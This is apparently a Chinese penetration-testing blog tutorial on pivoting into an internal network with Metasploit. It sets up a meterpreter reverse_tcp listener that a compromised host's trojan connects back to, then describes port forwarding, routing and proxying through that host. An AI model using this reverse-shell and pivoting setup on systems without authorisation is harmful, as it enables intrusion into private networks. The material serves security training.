MSF之端口转发&隧道建立
MSF端口转发&隧道建立
: : 当我们好不容易通过外网打点成功获取一台主机的控制权时,如何渗透入内网来扩大战果呢?一般内网服务器都会被设置为不出网的状态,这时我们就需要用到端口转发和设置隧道来建立起攻击机与内网主机的通信通道,架设起内网渗透的桥梁!
目标监听
开启MSF控制台
1 | msfconsole |
打开监听模块
1 | use exploit/multi/handler |
设置连接的payload类型
1 | set payload windows/meterpreter/reverse_tcp |
设置监听IP
1 | set lhost 192.168.182.185 |
设置监听端口
1 | set lport 7777 |
查看配置设置情况
1 | show options |
运行监听模块,肉鸡运行木马完成上线
1 | run |
查看肉鸡网络配置,发现有两张网卡分别为192.168.182.0/24网段和12.12.12.0/24网段
在12.12.12.0/24网段中存在一台不出网的服务器,但可与肉鸡通信
肉鸡能与内网服务器通信
攻击机不能与内网服务器通信
端口转发
设置端口转发功能,将流入攻击机7788端口的流量通过肉鸡转发给内网服务器的80端口
成功访问内网服务器HTTP服务
设置隧道
在肉鸡上设置路由功能,将12.12.12.0/24网段联通
挂起链接会话
在本机设置路由12.12.12.0/24网段交由会话1的肉鸡进行转发
输出路由配置进行检查
运行kali自带的代理模块,可不用设置直接使用默认配置
更改代理器的配置文件,将信息修改成与模块配置一致
开启代理功能访问内网服务器
成功访问内网的HTTP服务
本文为小余同学的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
